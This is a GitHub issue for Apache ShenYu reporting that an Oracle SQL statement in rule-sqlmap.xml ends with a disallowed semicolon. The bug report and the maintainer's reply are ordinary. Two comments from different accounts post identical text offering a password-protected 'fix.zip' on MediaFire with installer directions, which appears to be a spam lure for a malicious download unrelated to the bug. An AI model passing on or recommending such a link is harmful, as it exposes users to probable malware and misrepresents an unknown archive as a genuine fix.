### ISSUE TITLE
[BUG] <title>Oracle database，rule-sqlmap.xml, ite's "getPluginNameBySelectorId"  end with ";",this is not allowed in Oracle database。

### ISSUE THREAD

**Issue by liwanpeng-qingdao** [apache/shenyu#5631]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Environment

```markdown
ShenYu version(s):
```

### Debug logs

![image](https://github.com/user-attachments/assets/4f7c1db3-afed-4012-8d9a-bf0af0a98333)
![image](https://github.com/user-attachments/assets/05baffe2-f4f6-4587-a6f5-1d22f2af0896)

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yu199195** [comment]
can you fix it？
